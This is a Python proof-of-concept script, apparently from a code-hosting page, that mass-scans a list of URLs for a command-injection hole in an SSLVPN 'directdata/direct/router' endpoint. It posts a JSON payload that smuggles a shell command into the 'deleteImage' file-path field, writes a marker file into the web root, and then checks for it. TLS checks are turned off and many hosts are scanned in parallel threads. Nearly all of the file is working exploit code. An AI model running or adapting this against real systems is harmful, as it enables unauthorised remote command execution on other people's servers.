/
poc.py
95 lines (69 loc) · 2.77 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# coding=UTF-8
import requests
import sys
import getopt
import math
import threading
requests.packages.urllib3.disable_warnings()
payload = "/directdata/direct/router"
poc = "o9isu852j.txt"
payload_data = """ {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo 'o9isu852j' >/var/www/html/o9isu852j.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} """
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4388.124 Safari/527.36',
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 ",
'Content-Type': 'application/json',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Length': '19443'
}
#def usage():
# print("python3 poc.py -t threads -u urls.txt")
def start():
if len(sys.argv) == 5 :
opts, args = getopt.getopt(sys.argv[1:], "t:u:")
for k,v in opts:
if k == "-t":
threads = v
elif k == "-u":
dic = v
m_scan(payload,threads,dic)
else:
print("python3 poc.py -t threads -u urls.txt")
def m_scan(payload,threads,dic):
result_list = []
threads_list= []
with open (dic,"r") as f:
dic_list = f.readlines()
if len(dic_list) % int(threads) == 0:
threads_read_line_num = len(dic_list) / int(threads)
else:
threads_read_line_num = math.ceil(len(dic_list) / int(threads))
i=0
temp_list = []
for line in dic_list:
i=i+1
if i % threads_read_line_num == 0:
temp_list.append(line.strip())
result_list.append(temp_list)
temp_list = []
else:
temp_list.append(line.strip())
for i in result_list:
threads_list.append(threading.Thread(target=scan, args=(payload,i)))
for t in threads_list:
t.start()
def scan(payload,dic):
for url_list in dic:
if ('http://' in url_list) or ('https://' in url_list):
pass
else:
url_list = 'http://'+url_list
try:
r_res = requests.post(url_list+'/'+payload, data=payload_data, headers=headers,verify=False)
r_exp = requests.get(url_list+'/'+poc,headers=headers,verify=False)
if "o9isu852j" in r_exp.text:
print(url_list+" 存在漏洞")
except:
pass
if __name__ =="__main__":
start()